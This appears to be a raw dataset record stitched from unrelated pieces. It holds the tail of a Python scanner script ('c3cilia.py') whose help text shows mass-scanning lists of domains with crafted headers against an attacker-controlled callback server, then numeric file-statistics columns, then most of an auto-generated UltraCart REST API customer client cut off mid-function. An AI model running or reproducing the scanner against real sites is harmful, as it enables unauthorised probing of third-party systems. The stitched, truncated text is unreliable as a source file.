print("\n <---------------------------------struck post scan-------------------------------------------------> \n")
sp1 = requests.post(url , headers=head1 , verify=False)
print("> " + r.url + " <---url")
print(sp1.request)
print(sp1)
print(sp1.headers)
#print(sp1.text)
print(sp1.links)
print("\n <---------------------------------struck post 1 scan-------------------------------------------------> \n")
def helpl():
banner()
print (cyan + "For single domain : " + yellow + "python c3cilia.py --url http://yourserver.com/ --target https://target.com/")
print (cyan + "For multiple domain : " + yellow + "cat live-domain.txt | xargs -n1 -p50 python c3cilia.py -u http://yourserver.com/ -t " + yellow)
print (cyan + "For multiple domain with proxy : " + yellow + "cat live-domain.txt | xargs -n1 -p50 python c3cilia.py -u http://yourserver.com/ -p -t " + yellow)
print (cyan + "For single domain with proxy : " + yellow + "python c3cilia.py --url http://yourserver.com/ --proxy --target https://target.com/")
if (len(sys.argv)<=1):
banner()
print("You must provide a target. Use -h or --help for help.")
print(" ")
sys.exit()
if (str(sys.argv[1]) == "-h" or str(sys.argv[1]) == "--help"):
helpl()
sys.exit()
elif (len(sys.argv) == 5 and str(sys.argv[1]) == "-u" or str(sys.argv[1]) == "--url" and str(sys.argv[3]) == "-t" or str(sys.argv[3]) == "--target"):
send()
elif (len(sys.argv) == 6 and str(sys.argv[1]) == "-u" or str(sys.argv[1]) == "--url" and str(sys.argv[3]) == "-p" or str(sys.argv[3]) == "--proxy" and str(sys.argv[4]) == "-t" or str(sys.argv[4]) == "--target"):
print ("proxy")
psend()
| 38.79803
| 211
| 0.508507
| 969
| 7,876
| 4.125903
| 0.160991
| 0.030015
| 0.038519
| 0.030015
| 0.837919
| 0.792646
| 0.774137
| 0.774137
| 0.753627
| 0.747374
| 0
| 0.023448
| 0.155282
| 7,876
| 202
| 212
| 38.990099
| 0.577484
| 0.069705
| 0
| 0.630303
| 0
| 0.054545
| 0.482409
| 0.243258
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.012121
| null | null | 0.618182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
035a327c0d599ec905f11b9f42622c196e5c0c1e
| 67,403
|
py
|
Python
|
ultracart/api/customer_api.py
|
UltraCart/rest_api_v2_sdk_python
|
d734ea13fabc7a57872ff68bac06861edb8fd882
|
[
"Apache-2.0"
] | 1
|
2018-03-15T16:56:23.000Z
|
2018-03-15T16:56:23.000Z
|
ultracart/api/customer_api.py
|
UltraCart/rest_api_v2_sdk_python
|
d734ea13fabc7a57872ff68bac06861edb8fd882
|
[
"Apache-2.0"
] | null | null | null |
ultracart/api/customer_api.py
|
UltraCart/rest_api_v2_sdk_python
|
d734ea13fabc7a57872ff68bac06861edb8fd882
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ultracart.api_client import ApiClient
from ultracart.configuration import Configuration
class CustomerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
@classmethod
def fromApiKey(cls, apiKey, verify_ssl = True, debug = False):
config = Configuration()
config.api_key['x-ultracart-simple-key'] = apiKey
config.debug = debug
config.verify_ssl = verify_ssl
api_client = ApiClient(configuration=config, header_name='X-UltraCart-Api-Version', header_value='2017-03-01')
return CustomerApi(api_client)
def delete_customer(self, customer_profile_oid, **kwargs): # noqa: E501
"""Delete a customer # noqa: E501
Delete a customer on the UltraCart account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_customer(customer_profile_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int customer_profile_oid: The customer_profile_oid to delete. (required)
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_customer_with_http_info(customer_profile_oid, **kwargs) # noqa: E501
else:
(data) = self.delete_customer_with_http_info(customer_profile_oid, **kwargs) # noqa: E501
return data
def delete_customer_with_http_info(self, customer_profile_oid, **kwargs): # noqa: E501
"""Delete a customer # noqa: E501
Delete a customer on the UltraCart account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_customer_with_http_info(customer_profile_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int customer_profile_oid: The customer_profile_oid to delete. (required)
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_profile_oid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_customer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_profile_oid' is set
if ('customer_profile_oid' not in params or
params['customer_profile_oid'] is None):
raise ValueError("Missing the required parameter `customer_profile_oid` when calling `delete_customer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_profile_oid' in params:
path_params['customer_profile_oid'] = params['customer_profile_oid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json; charset=UTF-8']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/{customer_profile_oid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer(self, customer_profile_oid, **kwargs): # noqa: E501
"""Retrieve a customer # noqa: E501
Retrieves a single customer using the specified customer profile oid. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer(customer_profile_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int customer_profile_oid: The customer oid to retrieve. (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_with_http_info(customer_profile_oid, **kwargs) # noqa: E501
else:
(data) = self.get_customer_with_http_info(customer_profile_oid, **kwargs) # noqa: E501
return data
def get_customer_with_http_info(self, customer_profile_oid, **kwargs): # noqa: E501
"""Retrieve a customer # noqa: E501
Retrieves a single customer using the specified customer profile oid. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_with_http_info(customer_profile_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int customer_profile_oid: The customer oid to retrieve. (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_profile_oid', 'expand'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_profile_oid' is set
if ('customer_profile_oid' not in params or
params['customer_profile_oid'] is None):
raise ValueError("Missing the required parameter `customer_profile_oid` when calling `get_customer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_profile_oid' in params:
path_params['customer_profile_oid'] = params['customer_profile_oid'] # noqa: E501
query_params = []
if 'expand' in params:
query_params.append(('_expand', params['expand'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/{customer_profile_oid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_by_email(self, email, **kwargs): # noqa: E501
"""Retrieve a customer by Email # noqa: E501
Retrieves a single customer using the specified customer email address. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_by_email(email, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str email: The email address of the customer to retrieve. (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_by_email_with_http_info(email, **kwargs) # noqa: E501
else:
(data) = self.get_customer_by_email_with_http_info(email, **kwargs) # noqa: E501
return data
def get_customer_by_email_with_http_info(self, email, **kwargs): # noqa: E501
"""Retrieve a customer by Email # noqa: E501
Retrieves a single customer using the specified customer email address. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_by_email_with_http_info(email, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str email: The email address of the customer to retrieve. (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['email', 'expand'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_by_email" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'email' is set
if ('email' not in params or
params['email'] is None):
raise ValueError("Missing the required parameter `email` when calling `get_customer_by_email`") # noqa: E501
collection_formats = {}
path_params = {}
if 'email' in params:
path_params['email'] = params['email'] # noqa: E501
query_params = []
if 'expand' in params:
query_params.append(('_expand', params['expand'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/by_email/{email}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_editor_values(self, **kwargs): # noqa: E501
"""Retrieve values needed for a customer profile editor # noqa: E501
Retrieve values needed for a customer profile editor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_editor_values(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: CustomerEditorValues
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_editor_values_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_customer_editor_values_with_http_info(**kwargs) # noqa: E501
return data
def get_customer_editor_values_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve values needed for a customer profile editor # noqa: E501
Retrieve values needed for a customer profile editor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_editor_values_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: CustomerEditorValues
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_editor_values" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/editor_values', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerEditorValues', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_email_lists(self, **kwargs): # noqa: E501
"""Retrieve all email lists across all storefronts # noqa: E501
Retrieve all email lists across all storefronts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_email_lists(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: EmailListsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_email_lists_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_customer_email_lists_with_http_info(**kwargs) # noqa: E501
return data
def get_customer_email_lists_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve all email lists across all storefronts # noqa: E501
Retrieve all email lists across all storefronts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_email_lists_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: EmailListsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_email_lists" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/email_lists', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailListsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customers(self, **kwargs): # noqa: E501
"""Retrieve customers # noqa: E501
Retrieves customers from the account. If no parameters are specified, all customers will be returned. You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customers(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str email: Email
:param str qb_class: Quickbooks class
:param str quickbooks_code: Quickbooks code
:param str last_modified_dts_start: Last modified date start
:param str last_modified_dts_end: Last modified date end
:param str signup_dts_start: Signup date start
:param str signup_dts_end: Signup date end
:param str billing_first_name: Billing first name
:param str billing_last_name: Billing last name
:param str billing_company: Billing company
:param str billing_city: Billing city
:param str billing_state: Billing state
:param str billing_postal_code: Billing postal code
:param str billing_country_code: Billing country code
:param str billing_day_phone: Billing day phone
:param str billing_evening_phone: Billing evening phone
:param str shipping_first_name: Shipping first name
:param str shipping_last_name: Shipping last name
:param str shipping_company: Shipping company
:param str shipping_city: Shipping city
:param str shipping_state: Shipping state
:param str shipping_postal_code: Shipping postal code
:param str shipping_country_code: Shipping country code
:param str shipping_day_phone: Shipping day phone
:param str shipping_evening_phone: Shipping evening phone
:param int pricing_tier_oid: Pricing tier oid
:param str pricing_tier_name: Pricing tier name
:param int limit: The maximum number of records to return on this one API call. (Max 200)
:param int offset: Pagination of the record set. Offset is a zero based index.
:param str since: Fetch customers that have been created/modified since this date/time.
:param str sort: The sort order of the customers. See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_customers_with_http_info(**kwargs) # noqa: E501
return data
def get_customers_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve customers # noqa: E501
Retrieves customers from the account. If no parameters are specified, all customers will be returned. You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customers_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str email: Email
:param str qb_class: Quickbooks class
:param str quickbooks_code: Quickbooks code
:param str last_modified_dts_start: Last modified date start
:param str last_modified_dts_end: Last modified date end
:param str signup_dts_start: Signup date start
:param str signup_dts_end: Signup date end
:param str billing_first_name: Billing first name
:param str billing_last_name: Billing last name
:param str billing_company: Billing company
:param str billing_city: Billing city
:param str billing_state: Billing state
:param str billing_postal_code: Billing postal code
:param str billing_country_code: Billing country code
:param str billing_day_phone: Billing day phone
:param str billing_evening_phone: Billing evening phone
:param str shipping_first_name: Shipping first name
:param str shipping_last_name: Shipping last name
:param str shipping_company: Shipping company
:param str shipping_city: Shipping city
:param str shipping_state: Shipping state
:param str shipping_postal_code: Shipping postal code
:param str shipping_country_code: Shipping country code
:param str shipping_day_phone: Shipping day phone
:param str shipping_evening_phone: Shipping evening phone
:param int pricing_tier_oid: Pricing tier oid
:param str pricing_tier_name: Pricing tier name
:param int limit: The maximum number of records to return on this one API call. (Max 200)
:param int offset: Pagination of the record set. Offset is a zero based index.
:param str since: Fetch customers that have been created/modified since this date/time.
:param str sort: The sort order of the customers. See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['email', 'qb_class', 'quickbooks_code', 'last_modified_dts_start', 'last_modified_dts_end', 'signup_dts_start', 'signup_dts_end', 'billing_first_name', 'billing_last_name', 'billing_company', 'billing_city', 'billing_state', 'billing_postal_code', 'billing_country_code', 'billing_day_phone', 'billing_evening_phone', 'shipping_first_name', 'shipping_last_name', 'shipping_company', 'shipping_city', 'shipping_state', 'shipping_postal_code', 'shipping_country_code', 'shipping_day_phone', 'shipping_evening_phone', 'pricing_tier_oid', 'pricing_tier_name', 'limit', 'offset', 'since', 'sort', 'expand'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'email' in params:
query_params.append(('email', params['email'])) # noqa: E501
if 'qb_class' in params:
query_params.append(('qb_class', params['qb_class'])) # noqa: E501
if 'quickbooks_code' in params:
query_params.append(('quickbooks_code', params['quickbooks_code'])) # noqa: E501
if 'last_modified_dts_start' in params:
query_params.append(('last_modified_dts_start', params['last_modified_dts_start'])) # noqa: E501
if 'last_modified_dts_end' in params:
query_params.append(('last_modified_dts_end', params['last_modified_dts_end'])) # noqa: E501
if 'signup_dts_start' in params:
query_params.append(('signup_dts_start', params['signup_dts_start'])) # noqa: E501
if 'signup_dts_end' in params:
query_params.append(('signup_dts_end', params['signup_dts_end'])) # noqa: E501
if 'billing_first_name' in params:
query_params.append(('billing_first_name', params['billing_first_name'])) # noqa: E501
if 'billing_last_name' in params:
query_params.append(('billing_last_name', params['billing_last_name'])) # noqa: E501
if 'billing_company' in params:
query_params.append(('billing_company', params['billing_company'])) # noqa: E501
if 'billing_city' in params:
query_params.append(('billing_city', params['billing_city'])) # noqa: E501
if 'billing_state' in params:
query_params.append(('billing_state', params['billing_state'])) # noqa: E501
if 'billing_postal_code' in params:
query_params.append(('billing_postal_code', params['billing_postal_code'])) # noqa: E501
if 'billing_country_code' in params:
query_params.append(('billing_country_code', params['billing_country_code'])) # noqa: E501
if 'billing_day_phone' in params:
query_params.append(('billing_day_phone', params['billing_day_phone'])) # noqa: E501
if 'billing_evening_phone' in params:
query_params.append(('billing_evening_phone', params['billing_evening_phone'])) # noqa: E501
if 'shipping_first_name' in params:
query_params.append(('shipping_first_name', params['shipping_first_name'])) # noqa: E501
if 'shipping_last_name' in params:
query_params.append(('shipping_last_name', params['shipping_last_name'])) # noqa: E501
if 'shipping_company' in params:
query_params.append(('shipping_company', params['shipping_company'])) # noqa: E501
if 'shipping_city' in params:
query_params.append(('shipping_city', params['shipping_city'])) # noqa: E501
if 'shipping_state' in params:
query_params.append(('shipping_state', params['shipping_state'])) # noqa: E501
if 'shipping_postal_code' in params:
query_params.append(('shipping_postal_code', params['shipping_postal_code'])) # noqa: E501
if 'shipping_country_code' in params:
query_params.append(('shipping_country_code', params['shipping_country_code'])) # noqa: E501
if 'shipping_day_phone' in params:
query_params.append(('shipping_day_phone', params['shipping_day_phone'])) # noqa: E501
if 'shipping_evening_phone' in params:
query_params.append(('shipping_evening_phone', params['shipping_evening_phone'])) # noqa: E501
if 'pricing_tier_oid' in params:
query_params.append(('pricing_tier_oid', params['pricing_tier_oid'])) # noqa: E501
if 'pricing_tier_name' in params:
query_params.append(('pricing_tier_name', params['pricing_tier_name'])) # noqa: E501
if 'limit' in params:
query_params.append(('_limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('_offset', params['offset'])) # noqa: E501
if 'since' in params:
query_params.append(('_since', params['since'])) # noqa: E501
if 'sort' in params:
query_params.append(('_sort', params['sort'])) # noqa: E501
if 'expand' in params:
query_params.append(('_expand', params['expand'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customers_by_query(self, customer_query, **kwargs): # noqa: E501
"""Retrieve customers by query # noqa: E501
Retrieves customers from the account. If no parameters are specified, all customers will be returned. You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customers_by_query(customer_query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CustomerQuery customer_query: Customer query (required)
:param int limit: The maximum number of records to return on this one API call. (Max 200)
:param int offset: Pagination of the record set. Offset is a zero based index.
:param str since: Fetch customers that have been created/modified since this date/time.
:param str sort: The sort order of the customers. See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customers_by_query_with_http_info(customer_query, **kwargs) # noqa: E501
else:
(data) = self.get_customers_by_query_with_http_info(customer_query, **kwargs) # noqa: E501
return data
def get_customers_by_query_with_http_info(self, customer_query, **kwargs): # noqa: E501
"""Retrieve customers by query # noqa: E501
Retrieves customers from the account. If no parameters are specified, all customers will be returned. You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customers_by_query_with_http_info(customer_query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CustomerQuery customer_query: Customer query (required)
:param int limit: The maximum number of records to return on this one API call. (Max 200)
:param int offset: Pagination of the record set. Offset is a zero based index.
:param str since: Fetch customers that have been created/modified since this date/time.
:param str sort: The sort order of the customers. See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_query', 'limit', 'offset', 'since', 'sort', 'expand'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customers_by_query" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_query' is set
if ('customer_query' not in params or
params['customer_query'] is None):
raise ValueError("Missing the required parameter `customer_query` when calling `get_customers_by_query`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in params:
query_params.append(('_limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('_offset', params['offset'])) # noqa: E501
if 'since' in params:
query_params.append(('_since', params['since'])) # noqa: E501
if 'sort' in params:
query_params.append(('_sort', params['sort'])) # noqa: E501
if 'expand' in params:
query_params.append(('_expand', params['expand'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'customer_query' in params:
body_params = params['customer_query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/query', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customers_for_data_tables(self, **kwargs): # noqa: E501
"""Retrieve customers for DataTables plugin # noqa: E501
Retrieves customers from the account. If no searches are specified, all customers will be returned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customers_for_data_tables(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: DataTablesServerSideResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customers_for_data_tables_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_customers_for_data_tables_with_http_info(**kwargs) # noqa: E501
return data
def get_customers_for_data_tables_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve customers for DataTables plugin # noqa: E501
Retrieves customers from the account. If no searches are specified, all customers will be returned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customers_for_data_tables_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: DataTablesServerSideResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['expand'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customers_for_data_tables" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'expand' in params:
query_params.append(('_expand', params['expand'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
